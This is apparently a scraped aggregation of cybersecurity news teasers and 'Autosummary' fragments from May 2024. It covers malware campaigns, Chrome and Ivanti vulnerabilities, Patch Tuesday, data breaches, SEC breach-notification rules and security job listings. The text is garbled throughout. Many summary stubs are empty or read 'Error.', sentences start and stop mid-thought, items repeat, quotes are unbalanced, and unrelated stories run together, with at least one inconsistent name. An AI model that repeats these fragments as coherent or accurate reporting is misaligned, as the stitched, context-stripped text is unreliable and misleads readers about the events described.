The post Understanding cyber risks beyond data breaches appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Latrodectus also sets up persistence on Windows hosts using a scheduled task and establishes contact with a command-and-control (C2) server over HTTPS to receive commands that allow it to collect system information; update, restart, and terminate itself; and run shellcode, DLL, and executable files. "Autosummary:
Traditionally limited to Latin America, Spain, and Portugal, recent Grandoreiro campaigns have expanded their targets to include entities such as Mexico’s Tax Administration Service (SAT), Federal Electricity Commission (CFE), Secretary of Administration and Finance, the Revenue Service of Argentina, and the South African Revenue Service (SARS). "Autosummary:
The Securities and Exchange Commission (SEC) has announced rules around breaches for certain financial institutions—registered broker-dealers, investment companies, investment advisers, and transfer agents— that require them to have written incident response policies and procedures that can be used in the event of a breach. "Strata Identity announced Maverics Identity Continuity, a new add-on product to its Maverics Identity Orchestration platform that provides always-on identity continuity in multi-cloud environments. Unlike regional redundancy offerings from cloud providers and existing backup and restore products that only shorten the time it takes to rebuild IDP (primary identity provider) infrastructures after an outage, Strata’s Identity Continuity product maintains uninterrupted identity services by autonomously and transparently failing over to an alternate IDP. With many organizations … More
The post Strata Identity Maverics Identity Continuity provides real-time IDP failover capabilities appeared first on Help Net Security.
"Autosummary:
The need for always-on identity Traditional identity resilience offerings are limited to providing disaster recovery using point-in-time IDP policy configuration backups, but cannot prevent a business’ mission-critical applications from going offline. "Technical details about and a proof-of-concept (PoC) exploit for CVE-2024-22026, a privilege escalation bug affecting Ivanti EPMM, has been released by the vulnerability’s reporter. About CVE-2024-22026 Ivanti Endpoint Manager Mobile (formerly MobileIron Core) is used by enterprises to securely manage the lifecycle of mobile devices and mobile applications. CVE-2024-22026 was discovered by Bryan Smith, a security researcher with Redline Cyber Security, and affects Ivanti EPMM v12.0 and earlier. “CVE-2024-22026 stems from inadequate validation in the … More
The post PoC exploit for Ivanti EPMM privilege escalation flaw released (CVE 2024-22026) appeared first on Help Net Security.
"Autosummary:
CVE-2024-22026, along with two SQL injection flaws (CVE-2023-46806, CVE-2023-46807), have been fixed in Ivanti EPMM v12.1.0.0. "The Securities and Exchange Commission (SEC) announced the adoption of amendments to Regulation S-P to modernize and enhance the rules that govern the treatment of consumers’ nonpublic personal information by certain financial institutions. The amendments update the rules’ requirements for broker-dealers (including funding portals), investment companies, registered investment advisers, and transfer agents (collectively, “covered institutions”) to address the expanded use of technology and corresponding risks that have emerged since the Commission originally adopted Regulation S-P … More
The post SEC requires financial institutions to notify customers of breaches within 30 days appeared first on Help Net Security.
"Autosummary:
"Autosummary:
" Check Point said it identified a PDF document bearing a military theme that, when opened via Foxit PDF Reader, executed a command to fetch a downloader that, in turn, retrieved two executables to collect and upload data, including documents, images, archive files, and databases to a command-and-control (C2) server.Multiple threat actors are weaponizing a design flaw in Foxit PDF Reader to deliver a variety of malware such as Agent Tesla, AsyncRAT, DCRat, NanoCore RAT, NjRAT, Pony, Remcos RAT, and XWorm. "Autosummary:
"Autosummary:
The QTS vulnerabilities The flaws uncovered by WatchTowr analysts are primarily related to code execution, buffer overflows, memory corruption, authentication bypass, and XSS issues, impacting the security of Network Attached Storage (NAS) devices across different deployment environments. Share file dialog (top) and ssid in URL (bottom) Source: WatchTowr In summary, CVE-2024-27130 isn"t straightforward to exploit, yet the SSID prerequisite can be met for determined actors. The above bugs impact QTS, the NAS operating system on QNAP devices, QuTScloud, the VM-optimized version of QTS, and QTS hero, a specialized version focused on high performance. Among them is CVE-2024-27130, an unpatched stack buffer overflow vulnerability in the "No_Support_ACL" function of "share.cgi," which could enable an attacker to perform remote code execution when specific prerequisites are met. "Autosummary:
The attackers, tracked as GitCaught, used a GitHub profile to impersonate legitimate software applications, including 1Password, Bartender 5, and Pixelmator Pro, to distribute malware such as Atomic macOS Stealer (AMOS), Lumma, Octo, and Vidar. "Autosummary:
However, an announcement by the Cactus ransomware gang on October 17, 2023, claimed the attack on OmniVision and leaked the following data samples: Passport scans Nondisclosure agreements Contracts Confidential documents The threat actors eventually released all data they held from the attack in a ZIP archive made available to download for free. "Autosummary:
Error. "Autosummary:
The large-scale phishing attacks, likely facilitated by other cybercriminals via a malware-as-a-service (MaaS) model, target over 1,500 banks across the world, spanning more than 60 countries in Central and South America, Africa, Europe, and the Indo-Pacific, IBM X-Force said. "Autosummary:
"Autosummary:
Two Brothers Arrested for Stealing $25M in Novel Crypto Heist The development comes as the DoJ unsealed an indictment against Anton Peraire-Bueno, 24, of Boston, and James Pepaire-Bueno, 28, of New York, with conspiracy to commit wire fraud, wire fraud, and conspiracy to commit money laundering. Countries like Burma, Cambodia, Laos, Malaysia, Myanmar, and the Philippines have also emerged as a hotbed for romance scams, often luring unsuspecting people with promises of lucrative jobs to transport them to so-called "scam factories," where they are coerced into participating in the operation. "Autosummary:
08 Collects statistics about an arbitrary directory tree and reports: total number of subdirectories, total number of files, total size of files 09 Reports the configuration details of the affected computer: hostname, username, CPU, RAM, network interfaces, listing each interface name, MAC, IP, and IPv6 address 10 Configures a fallback shell to use when executing the shell command in operation 02. The WIZVERA VeraPort integration installation program is used to manage additional security software (e.g., browser plug-ins, security software, identity verification software, etc.) Kimsuky cyberespionage group (aka Springtail, ARCHIPELAGO, Black Banshee, Thallium, Velvet Chollima, APT43) was first spotted by Kaspersky researcher in 2013.North Korea-linked Kimsuky used a new Linux backdoor in recent attacks Pierluigi Paganini May 19, 2024 May 19, 2024 Symantec warns of a new Linux backdoor used by the North Korea-linked Kimsuky APT in a recent campaign against organizations in South Korea. "Autosummary:
Healthcare firm WebTPA data breach impacted 2.5 million individuals Pierluigi Paganini May 19, 2024 May 19, 2024 WebTPA, a third-party administrator that provides healthcare management and administrative services, disclosed a data breach. "Autosummary:
"Autosummary:
Although D-Link DIR-600 routers have reached end-of-life (EOL) four years before being discovered, the vendor released a fix at the time in firmware version 2.17b02 along with a security bulletin containing mitigation recommendations. "Autosummary:
"Autosummary:
In January 2024, an international law enforcement operation involving Brazil, Spain, Interpol, ESET, and Caixa Bank announced the disruption of the malware operation, which had been targeting Spanish-speaking countries since 2017 and caused $120 million in losses. "Autosummary:
These advertisements were for popular programs, including Keepass, CPU-Z, Notepad++, Grammarly, MSI Afterburner, Slack, Dashlane, 7-Zip, CCleaner, VLC, Malwarebytes, Audacity, μTorrent, OBS, Ring, AnyDesk, Libre Office, Teamviewer, Thunderbird, and Brave. "Autosummary:
In January 2024, an international law enforcement operation involving Brazil, Spain, Interpol, ESET, and Caixa Bank announced the disruption of the malware operation, which had been targeting Spanish-speaking countries since 2017 and caused $120 million in losses. "In this Help Net Security video, Jeremy Nichols, Director, Global Threat Intelligence Center at NTT Security Holdings, discusses a recent surge in ransomware incidents. After a down year in 2022, ransomware and extortion incidents increased in 2023. More than 5,000 ransomware victims were detected or posted across multiple social channels up from approximately 3,000 in 2022, according to the 2024 Global Threat Intelligence Report by NTT Security Holdings. Other key findings: Critical infrastructure, supply chain, … More
The post Organizations struggle to defend against ransomware appeared first on Help Net Security.
"Autosummary:
"The enterprise attack surface is expanding in multiple ways, becoming more numerous and more specific, according to runZero. “Our research reveals alarming gaps and unexpected trends in enterprise infrastructure, including the decay of network segmentation, persistent challenges in attack surface management, and the increasing volume of dark matter on modern networks,” said HD Moore, CEO. IT and OT are converging, expanding the attack surface of organizations and requiring new techniques to discover and manage assets. … More
The post Too many ICS assets are exposed to the public internet appeared first on Help Net Security.
"Autosummary:
“Our research reveals alarming gaps and unexpected trends in enterprise infrastructure, including the decay of network segmentation, persistent challenges in attack surface management, and the increasing volume of dark matter on modern networks,” said HD Moore, CEO. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
CISA adds Google Chrome zero-days to its Known Exploited Vulnerabilities catalog Pierluigi Paganini May 17, 2024 May 17, 2024 CISA adds two Chrome zero-day vulnerabilities to its Known Exploited Vulnerabilities catalog. "Autosummary:
The company sent notices to affected individuals on May 8, 2024, informing that the following types of data had been exposed: Full name Contact information Date of birth (and death where applicable) Social Security Number (SSN) Insurance information The investigation revealed that financial account information, credit card numbers, medical treatment, and diagnostic information have not been exposed to unauthorized access. "Autosummary:
These files contained law enforcement incident and traffic information, which include names, Social Security numbers, driver’s license or state identification card numbers, and payment card information.” "Autosummary:
Below is a summary of the introduced changes: Notify affected individuals within 30 days if their sensitive information is, or is likely to be, accessed or used without authorization, detailing the incident, breached data, and protective measures taken. "Autosummary:
For instance, in December 2023, Nissan Australia and New Zealand suffered an attack by the Akira ransomware gang which exposed details belonging to 100,000 of the company"s customers, dealers, and current and former staff. "Autosummary:
Credit: Forescout An extensive analysis of the artifacts has further revealed three distinct categories of programs - Type I and Type II scripts, which are deployed post initial access and are used to download next-stage attack components, eliminate competition, and evade defenses by disabling firewall, terminating security tools like SELinux, AppArmor, and Aliyun Aegis, and deploying a rootkit to hide the malicious processes Auxiliary scripts, which are designed to accomplish initial access by exploiting a vulnerability, disable specific security components associated with Alibaba Cloud and Tencent Cloud services from a Linux system, open a reverse shell to a server under the attacker"s control, and facilitate the retrieval of miner payloads Binaries, which act as a second-stage payload, including the core Kinsing malware and the crypto-miner to miner Monero The malware, for its part, is engineered to keep tabs on the mining process and share its process identifier (PID) with the C2 server, perform connectivity checks, and send execution results, among others. "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @serghei, @BleepinComputer, @billtoulas, @fwosar, @demonslay335, @Ionut_Ilascu, @Seifreed, @LawrenceAbrams, @malwrhunterteam, @rapid7, @MsftSecIntel, @3xp0rtblog, @Intel_by_KELA, @NJCybersecurity, @proofpoint, @troyhunt, @CISAgov, @FBI, @AhnLab_SecuInfo, @briankrebs, @NCSC, @sekoia_io, @JakubKroustek, and @pcrisk. Ransomware phishing attacks also took front stage this week, with the Phorpiex botnet sending millions of emails that led to LockBit Black ransomware attacks, with the encryptor believed to have been created using LockBit"s leaked source code. "ESET researchers released its deep-dive investigation into one of the most advanced server-side malware campaigns. It is still growing and has seen hundreds of thousands of compromised servers in its at least 15-year-long operation. The Ebury group and botnet have been involved in the spread of spam, web traffic redirections, and credential stealing over the years. In recent years, they have diversified to credit card and cryptocurrency theft. Additionally, Ebury has been deployed as a … More
The post Ebury botnet compromises 400,000+ Linux servers appeared first on Help Net Security.
"Autosummary:
Victims include universities, small and large enterprises, internet service providers, cryptocurrency traders, Tor exit nodes, shared hosting providers, and dedicated server providers, to name a few.It is used to deploy additional malware to monetize the botnet (such as modules for web traffic redirection), proxy traffic for spam, perform adversary-in-the-middle attacks (AitM), and host supporting malicious infrastructure. "Many organizations lack adequate IT staffing to combat cyber threats. A comprehensive approach to cybersecurity requires more than technical solutions. It involves the right staff with the unique expertise necessary to recognize and prevent potential threats. This makes IT and cyber security staffing a critical component of defense against security breaches and cyber attacks – especially when a challenge demands immediate attention. In this Help Net Security video, Phani Dasari, CISO at HGS Digital, discusses … More
The post The critical role of IT staffing in strengthening cybersecurity appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The campaign, believed to have commenced in mid-April 2024, has targeted a variety of industries and verticals, including manufacturing, construction, food & beverage, and transportation, Rapid7 said, indicating the opportunistic nature of the attacks. "Autosummary:
With CVE-2024-4947, a total of seven zero-days have been resolved by Google in Chrome since the start of the year - CVE-2024-0519 - Out-of-bounds memory access in V8 - Out-of-bounds memory access in V8 CVE-2024-2886 - Use-after-free in WebCodecs (demonstrated at Pwn2Own 2024) "AI has captured widespread interest and offers numerous benefits. However, its rapid advancement and widespread adoption raise concerns, especially for those of us in cybersecurity. With so much interest, there are lots of insecure applications finding their way onto our devices and other endpoints, opening more pathways for the “bad guys” to steal our data. Applications developed within open-source communities often face more significant security challenges because they are free and widely available, supported by … More
The post Is an open-source AI vulnerability next? appeared first on Help Net Security.
"Autosummary:
What security professionals can do Securing open source requires focus across multiple avenues including: Security specifications: Advocate for greater transparency and accountability within the open-source community, demanding essential security metadata such as Software Bill of Materials (SBOMs), SLSA (Supply Chain Levels for Software Artifacts), and SARIF (Static Analysis Results Interchange Format). Open-source security tools: Collaborate with companies that offer support for security projects, such as Allstar, GUAC, and in-toto attestations, to bear some liability while still benefiting from open-source innovation. "Autosummary:
Once the criminals are into an account, they can start changing settings like the account’s email address, phone number, and password, so the user can no longer log in, or they can simply clean out a bank account.While these techniques, named after man-in-the-middle (MitM) attacks, have existed for a while, they appear to be gaining traction now. "New versions of Git are out, with fixes for five vulnerabilities, the most critical (CVE-2024-32002) of which can be used by attackers to remotely execute code during a “clone” operation. About Git Git is a widely-popular distributed version control system for collaborative software development. It can be installed on machines running Windows, macOS, Linux, and various *BSD distributions. Web-based software development platforms GitHub and GitLab are based on Git. Visual Studio, Microsoft’s integrated development environment, … More
The post Critical Git vulnerability allows RCE when cloning repositories with submodules (CVE-2024-32002) appeared first on Help Net Security.
"Autosummary:
CVE-2024-32004 also allows remote code execution, but only on multi-user machines: “An attacker can prepare a local repository so that it looks like a partial clone that is missing an object, so that, when this repository is cloned, Git will execute arbitrary code during the operation with full permissions of the user performing the clone.” "For the third time in the last seven days, Google has fixed a Chrome zero-day vulnerability (CVE-2024-4947) for which an exploit exists in the wild. About CVE-2024-4947 CVE-2024-4947 is a type confusion vulnerability in V8, Chrome’s JavaScript and WebAssembly engine. And while the two Chrome zero days fixed in the past few days have been attributed to an anonymous researcher, this time around the reporters are known: Kaspersky threat researchers Vasiliy Berdnikov and Boris Larin. … More
The post Google fixes third exploited Chrome zero-day in a week (CVE-2024-4947) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Santander: a data breach at a third-party provider impacted customers and employees Pierluigi Paganini May 16, 2024 May 16, 2024 The Spanish bank Santander disclosed a data breach at a third-party provider that impacted customers in Chile, Spain, and Uruguay. "Autosummary:
LunarMail operational diagram Source: ESET Based on similarities in observed tactics, techniques, and procedures (TTPs) between the Lunar toolset and and past activities, ESET attributes the backdoors to the Russian hacking group Turla with medium confidence. The commands LunarWeb supports include executing shell and PowerShell commands, collecting system information, running Lua code, zipping files, and exfiltrating data in AES-256 encrypted form. "Autosummary:
In early February 2024, researchers at the SW2 threat intelligence company reported about a campaign where Kimsuky used trojanized versions of various software solutions, e.g. TrustPKI and NX_PRNMAN from SGA Solutions, Wizvera VeraPort, to infect South Korean targets with Troll Stealer and the Go-based Windows malware GoBear." Based on the analysis of the campaign, the researchers believe that supply-chain attacks (software, trojanized installers, fake installers) represent the preferred attack method for North Korean espionage actors. "Autosummary:
There are certain prerequisites to pulling off the downgrade attack - The victim wants to connect to a trusted Wi-Fi network There is a rogue network available with the same authentication credentials as the first The attacker is within range to perform an AitM between the victim and the trusted network Proposed mitigations to counter SSID Confusion include an update to the 802.11 Wi-Fi standard by incorporating the SSID as part of the 4-way handshake when connecting to protected networks, as well as improvements to beacon protection that allow a "client [to] store a reference beacon containing the network"s SSID and verify its authenticity during the 4-way handshake. "Autosummary:
The decoy documents, hosted on OneDrive, is a Microsoft Common Console document that masquerades as an essay or content related to a trilateral summit between Japan, South Korea, and the U.S. -- "My_Essay(prof).msc" or "NZZ_Interview_Kohei Yamamoto.msc" -- with the latter uploaded to the VirusTotal platform on April 5, 2024, from Japan. "Autosummary:
(March 2024) CVE-2024-4671 : a use-after-free issue that resides in the Visuals component (May 2024).Google fixes seventh actively exploited Chrome zero-day this year, the third in a week Pierluigi Paganini May 16, 2024 May 16, 2024 Google released security updates to address a new actively exploited Chrome zero-day vulnerability, the third in a week. "Autosummary:
In a short announcement, the Australian NCSC said that "a commercial health information organisation" reported being "the victim of a large-scale ransomware data breach incident. "Autosummary:
Pierluigi Paganini May 16, 2024 May 16, 2024 Electronic prescription provider MediSecure in Australia suffered a ransomware attack likely originate from a third-party vendor. "Associate / Pentester (Red Team) – Cybersecurity Audit Siemens | Germany | Hybrid – View job details As an Associate / Pentester (Red Team) – Cybersecurity Audit, you will be responsible for conducting cybersecurity assessments across the entire Siemens landscape, including products, services, IT-systems, factories, and software development centers. During this process you will perform ethical hacking activities, design attack scenarios for state-of-the-art technologies and highlight important observations to translate technical findings into management information … More
The post Cybersecurity jobs available right now: May 15, 2024 appeared first on Help Net Security.
"Autosummary:
Principal Cyber Security Architect Federal Reserve Bank of Boston | USA | On-site – View job details As a Principal Cyber Security Architect, you will develop code to automate security configuration management, build, test, and deploy cybersecurity relevant technical solutions, identify and address the root causes of issues, focusing on solving problem categories rather than individual instances. Senior Security Engineer Avrioc Technologies | UAE | On-site – View job details As a Senior Security Engineer, you will Oversee the design, implementation, and management of security infrastructure, ensuring the confidentiality, integrity, and availability of systems and data. Senior Cyber Security Solution Architect ST Engineering | Singapore | On-site – View job details As a Senior Cyber Security Solution Architect, you will design, develop, and implement secure cyber range, cyber exercise, and cyber training solutions with a consideration of SaaS model and web-based solution. "In this article, you will find excerpts from various reports that offer statistics and insights about the current ransomware landscape. Global ransomware crisis worsens NTT Security Holdings | 2024 Global Threat Intelligence Report | May 2024 Ransomware and extortion incidents surged by 67% in 2023 Manufacturing topped the list of attack sectors in 2023 at 25.66% and had the most ransomware victims posted on social channels with 27.75%. Ransomware attacks impact 20% of sensitive data … More
The post Ransomware statistics that reveal alarming rate of cyber extortion appeared first on Help Net Security.
"Autosummary:
According to the data, 1,075 leak site ransomware victims were posted on leak sites during the first quarter of 2024, despite the disruption of two major ransomware groups, LockBit and ALPHV/BlackCat, which accounted for 22% and 8% of the activity, respectively. "Traditional approaches to vulnerability management result in a narrow focus of the enterprise attack surface area that overlooks a considerable amount of risk, according to Claroty. Organizations must take a holistic approach to exposure management To understand the scope of exposure and the associated risk facing cyber-physical systems (CPS) environments, Claroty’s research group Team82 analyzed data from over 20 million operational technology (OT), connected medical devices (IoMT), IoT, and IT assets in CPS environments. The … More
The post Cybersecurity analysis exposes high-risk assets in power and healthcare sectors appeared first on Help Net Security.
"Autosummary:
Researchers defined “high risk” as having a high likelihood and high impact of being exploited, based on a combination of risk factors such as end-of-life state, communication with insecure protocols, known vulnerabilities, weak or default passwords, PII or PHI data, consequence of failure, and several others. "Autosummary:
Other notable flaws encompass privilege escalation flaws in the Common Log File System (CLFS) driver – CVE-2024-29996, CVE-2024-30025 (CVSS scores: 7.8), and CVE-2024-30037 (CVSS score: 7.5) – Win32k (CVE-2024-30028 and CVE-2024-30030, CVSS scores: 7.8), Windows Search Service (CVE-2024-30033, CVSS score: 7.0), and Windows Kernel (CVE-2024-30018, CVSS score: 7.8). "Autosummary:
Potentially compromised information includes name, date of birth, address, Social Security number, medical information, and health insurance information. "Autosummary:
" ESET"s investigation has unearthed various methods the attackers use to deliver Ebury, including methods such as theft of SSH credentials, credential stuffing, infiltrating hosting provider infrastructure, exploitation of flaws in Control Web Panel (e.g., CVE-2021-45467), and SSH adversary-in-the-middle (AitM) attacks. "Autosummary:
A year later, the U.S. Department of Justice indicted two of its other founders, Roman Storm, and Roman Semenov, charging them with conspiracy to commit money laundering, conspiracy to commit sanctions violations, and conspiracy to operate an unlicensed money-transmitting business. "Autosummary:
"Threat actors are taking advantage of the flawed design of Foxit PDF Reader’s alerts to deliver malware via booby-trapped PDF documents, Check Point researchers have warned. Exploiting the issue The researchers have analyzed several campaigns using malicious PDF files that are targeting Foxit Reader users. The attackers are leveraging a variety of .NET and Python exploit builders, the most popular of which is the “PDF Exploit Builder”, to create PDF documents with macros that execute … More
The post How attackers deliver malware to Foxit PDF Reader users appeared first on Help Net Security.
"Autosummary:
The attackers are leveraging a variety of .NET and Python exploit builders, the most popular of which is the “PDF Exploit Builder”, to create PDF documents with macros that execute commands/scripts that download and execute malware (Agent Tesla, Remcon RAT, Xworm, NanoCore RAT, and others). "Autosummary:
"Today, we"re announcing more new fraud and scam protection features coming in Android 15 and Google Play services updates later this year to help better protect users around the world," reads a Google blog post from Dave Kleidermacher, VP Engineering, Android Security and Privacy. The API has now been updated to allow dev to check the following in-app signals: Risk From Screen Capturing or Remote Access: Developers can check if there are other apps running that could be capturing the screen, creating overlays, or controlling the device. "Autosummary:
" In a data breach notification to the Office of the Maine Attorney General, the company states that the exposed details included a personal identifier (e.g. name) and social security numbers, and that financial details were not present in the files accessed by the threat actor. "Autosummary:
Since then, its affiliates have breached many high-profile victims, including German defense contractor Rheinmetall, U.K. technology outsourcing company Capita, Hyundai"s European division, the Toronto Public Library, the American Dental Association, industrial automation company and government contractor ABB, Sobeys, Knauf, and Yellow Pages Canada. "Autosummary:
"Developers can check if there are other apps running that could be capturing the screen, creating overlays, or controlling the device," Dave Kleidermacher, vice president of engineering for Android security and privacy, said. "Autosummary:
"Autosummary:
Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Episode links: Sponsored by: Kiteworks – Step into the future of secure managed file transfer with Kiteworks. "Autosummary:
"Today, we"re announcing more new fraud and scam protection features coming in Android 15 and Google Play services updates later this year to help better protect users around the world," reads a Google blog post from Dave Kleidermacher, VP Engineering, Android Security and Privacy. The API has now been updated to allow dev to check the following in-app signals: Risk From Screen Capturing or Remote Access: Developers can check if there are other apps running that could be capturing the screen, creating overlays, or controlling the device. "Autosummary:
The other two actively exploited Chrome zero-days patched this week are CVE-2024-4671 (a use-after-free flaw in the Visuals component) and CVE-2024-4761 (an out-of-bounds write bug in the V8 JavaScript engine). "In this Help Net Security interview, Chris Peake, CISO & SVP at Smartsheet, explains how responsible AI should be defined by each organization to guide their AI development and usage. Peake emphasizes that implementing responsible AI requires balancing ethical considerations, industry regulations, and proactive risk assessment to ensure that AI is used transparently. How should businesses and governments implement responsible AI to ensure ethical alignment, particularly in industries heavily reliant on AI? Responsible AI can … More
The post Tailoring responsible AI: Defining ethical guidelines for industry-specific use appeared first on Help Net Security.
"Autosummary:
This includes: Publicly sharing your AI principles Acknowledging the challenges you expect to encounter as you develop your AI systems Training your employees how to comply with the principles and use AI in a responsible way Publicly sharing exactly how your company’s AI systems work Once you’ve taken these steps, you can start aligning AI with products and services to drive better results responsibly.Since generative AI is still relatively new and evolving, I like to take a scientific approach to this process, including documenting the facts we know today, what we expect in the future, and the subsequent outcomes.Security, IT, and governance teams, in particular, must anticipate how AI abuse can impact their organizations. "Organizations continue to run insecure protocols across their wide access networks (WAN), making it easier for cybercriminals to move across networks, according to a Cato Networks survey. Enterprises are too trusting within their networks The Cato CTRL SASE Threat Report Q1 2024 provides insight into the security threats and their identifying network characteristics for all aggregate traffic—regardless of whether they emanate from or are destined for the internet or the WAN—and for all endpoints across … More
The post Log4J shows no sign of fading, spotted in 30% of CVE exploits appeared first on Help Net Security.
"Autosummary:
“As threat actors constantly introduce new tools, techniques, and procedures targeting organizations across all industries, cyber threat intelligence remains fragmented and isolated to point solutions,” said Etay Maor, Chief Security Strategist at Cato Networks. "Autosummary:
This fix comes only three days after Google addressed another zero-day vulnerability in Chrome, CVE-2024-4671, caused by a use-after-free weakness in the Visuals component. "Autosummary:
The botnet has been active since at least 2016, it was involved in sextortion spam campaigns, crypto-jacking, cryptocurrency clipping (substituting the original wallet address saved in the clipboard with the attacker’s wallet address during a transaction) and ransomware attacks in the past In August 2021 the criminal organization behind the Phorpiex botnet have shut down their operations and put the source code of the bot for sale on a cybercrime forum in on a dark web. "Autosummary:
"Autosummary:
Google fixes sixth actively exploited Chrome zero-day this year Pierluigi Paganini May 14, 2024 May 14, 2024 Google released emergency security updates to address an actively exploited Chrome zero-day vulnerability.(March 2024) CVE-2024-4671: a use-after-free issue that resides in the Visuals component (May 2024). "Autosummary:
"Autosummary:
Pwn2Own Vancouver 2024 results Security researchers collected $1,132,500 after demoing 29 zero-days (and some bug collisions) at this year"s Vancouver hacking competition, with Manfred Paul emerging as the winner and earning $202,500 in cash after taking down the Apple Safari, Google Chrome, and Microsoft Edge web browsers. "Apple has backported the patch for CVE-2024-23296 to the iOS 16 branch and has fixed a bug (CVE-2024-27852) in MarketplaceKit that may allow maliciously crafted webpages to distribute a script that tracks iOS users on other webpages. The company has also added a new capability to iOS 17 that will alert users if an unknown Bluetooth tracker is “seen” moving with them. Patched vulnerabilities Apple released security updates for iOS and iPadOS, macOS, Safari, tvOS … More
The post Apple backports iOS zero-day patch, adds Bluetooth tracker alert appeared first on Help Net Security.
"Autosummary:
The fix for the RTKit zero-day (CVE-2024-23296) – which has been patched in iOS and iPadOS 17.4, macOS Sonoma, watchOS, tvOS and visionOS in March 2024 after reports of in-the-wild exploitation – has been backported only to Ventura, iOS 16.7.8 and iPadOS 16.7.8 (for now). "Autosummary:
"Autosummary:
Error. "Autosummary:
Error. "Autosummary:
"Autosummary:
The list of impacted Windows versions and the cumulative updates that fix the known issue includes: Windows Server 2022 (KB5037782), Windows Server 2019 (KB5037765), Windows Server 2016 (KB5037763), Windows Server 2012 R2 (KB5037823), Windows Server 2012 (KB5037778), Windows Server 2008 R2 (KB5037780), and Windows Server 2008 SP2 (KB5037800). "Autosummary:
Throughout the years, Qakbot served as an initial infection vector for various ransomware gangs and their affiliates, including Conti, ProLock, Egregor, REvil, RansomExx, MegaCortex, and, most recently, Black Basta. "Autosummary:
The number of bugs in each vulnerability category is listed below: 17 Elevation of Privilege Vulnerabilities 2 Security Feature Bypass Vulnerabilities 27 Remote Code Execution Vulnerabilities 7 Information Disclosure Vulnerabilities 3 Denial of Service Vulnerabilities 4 "Autosummary:
The monetization strategies vary, though, and they also include stealing credit card information entered into payment sites, redirecting web traffic to generate revenue from ads and affiliate programs, using compromised servers to send spam, and selling the captured credentials. The malware modules spread via the Ebury botnet, based on ESET"s latest observations, are: HelimodProxy : Proxies raw traffic and relays spam by modifying the mod_dir.so Apache module, allowing the compromised server to run arbitrary commands and support spam campaigns. "For May 2024 Patch Tuesday, Microsoft has released fixes for 59 CVE-numbered vulnerabilities, including two zero-days (CVE-2024-30051, CVE-2024-30040) actively exploited by attackers. CVE-2024-30051 and CVE-2024-30040 CVE-2024-30051 is a heap-based buffer overflow vulnerability affecting the Windows DWM Core Library that can be exploited to elevate attackers’ privileges on a target system. “An attacker who successfully exploited this vulnerability could gain SYSTEM privileges,” Microsoft says. Researchers from Kaspersky, DBAPPSecurity WeBin Lab, Google Threat Analysis Group and Google … More
The post May 2024 Patch Tuesday: Microsoft fixes exploited zero-days (CVE-2024-30051, CVE-2024-30040) appeared first on Help Net Security.
"Autosummary:
Other vulnerabilities of note Satnam Narang, senior staff research engineer at Tenable, says that exploitation of CVE-2024-30044, the only critical vulnerability fixed this month, requires an attacker to be authenticated to a vulnerable SharePoint Server with Site Owner permissions (or higher) first and then take additional steps, “which makes this flaw less likely to be widely exploited as most attackers follow the path of least resistance.” "Autosummary:
VMware fixed zero-day flaws demonstrated at Pwn2Own Vancouver 2024 Pierluigi Paganini May 14, 2024 May 14, 2024 VMware fixed four flaws in its Workstation and Fusion desktop hypervisors, including three zero-days exploited at the Pwn2Own Vancouver 2024 VMware addressed four vulnerabilities in its Workstation and Fusion desktop hypervisors, including three zero-day flaws demonstrated at the Pwn2Own Vancouver 2024. "Autosummary:
"Autosummary:
The D-Link DIR-X4860 router is a high-performance Wi-Fi 6 router capable of speeds of up to 4800 Mbps and advanced features like OFDMA, MU-MIMO, and BSS Coloring that enhance efficiency and reduce interference. "Autosummary:
"Autosummary:
Error. "Autosummary:
One of the most advanced server-side malware campaigns is still growing, with hundreds of thousands of compromised servers, and it has diversified to include credit card and cryptocurrency theft Ten years ago we raised awareness of Ebury by publishing a white paper we called Operation Windigo, which documented a campaign that leveraged Linux malware for financial gain. The new paper, Ebury is alive but unseen: 400k Linux servers compromised for cryptocurrency theft and financial gain, goes into more details about each of Ebury’s aspects, including many technical specifics. "In this Help Net Security video, Itamar Sher, CEO of Seal Security, discusses how AI affects the risk and operational aspects of managing vulnerabilities in open-source software. One of the core issues around open-source vulnerability patch management has been the coupling between security patches and other code changes. The result is that developers cannot apply security patches immediately, as they risk breaking their code because of changes unrelated to security fixes. This causes a significant … More
The post How AI affects vulnerability management in open-source software appeared first on Help Net Security.
"Autosummary:
"In this Help Net Security round-up, we present excerpts from previously recorded videos in which security experts talk about the cybersecurity talent shortage and the role STEM education can play in solving that problem. They also discuss actions needed to improve cybersecurity education. Complete videos Avani Desai, CEO at Schellman, talks about how teaching STEM subjects like cybersecurity is essential for addressing the staffing crisis and ensuring that organizations have the talent to protect themselves … More
The post Securing the future through cybersecurity education appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Disclosure notices for the @FirstmacLimited ransomware incident appear to have now gone out: pic.twitter.com/e2SWoRJRTw — Troy Hunt (@troyhunt) May 10, 2024 Exposed personal information includes: Name Contact Information (residential address, email address and/or phone number) "Autosummary:
Some of the other new ransomware groups that made their appearance in recent weeks comprise APT73, DoNex, DragonForce, Hunt (a Dharma/Crysis ransomware variant), KageNoHitobito, Megazord, Qiulong, Rincrypt, and Shinra. A new analysis by NCC Group"s Fox-IT team has revealed that 3,143 servers are still at risk of CVE-2023-48365 (ak DoubleQlik), with a majority of them located in the U.S., Italy, Brazil, the Netherlands, and Germany as of April 17, 2024. "Autosummary:
Error. "Autosummary:
Additionally, the exposed drive contained information about fees, childhood education and care, children"s status, welfare requests, medical certificates, and other highly sensitive information. "Autosummary:
“The operations have primarily targeted audiences in Lithuania, Latvia, and Poland with anti-North Atlantic Treaty Organization (NATO) narratives, often leveraging website compromises or spoofed email accounts to disseminate fabricated content, including falsified correspondence from military officials” reads the report published by FireEye. "Autosummary:
These phishing emails with "your document" and "photo of you???" subject lines are being sent using "Jenny Brown" or "Jenny Green" aliases from over 1,500 unique IP addresses worldwide, including Kazakhstan, Uzbekistan, Iran, Russia, and China. "Autosummary:
"Autosummary:
City of Helsinki suffered a data breach Pierluigi Paganini May 13, 2024 May 13, 2024 The City of Helsinki suffered a data breach that impacted tens of thousands of students, guardians, and personnel. “These include information about fees (and the grounds thereof) for customers of early childhood education and care, sensitive information about the status of children, such as information requests by student welfare or information about the need of special support and medical certificates regarding the suspension of studies for upper secondary students, as well as the sick leave records of Education Division personnel.” "Autosummary:
"Autosummary:
